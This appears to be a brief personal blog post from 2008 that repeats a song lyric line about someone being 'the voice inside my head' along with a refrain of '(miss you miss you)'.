Dont waste your time on me you're already the voice in side my head!
(miss you miss you)

Dont waste your time on me you're already the voice in side my head!
(miss you miss you)

Dont waste your time on me you're already the voice in side my head!
(miss you miss you)

(miss you miss you)

(miss you miss you)

(miss you miss you)

(miss you miss you)

[+/-] Selengkapnya...

cryptonseankingston © 2008 Template by:
SkinCorner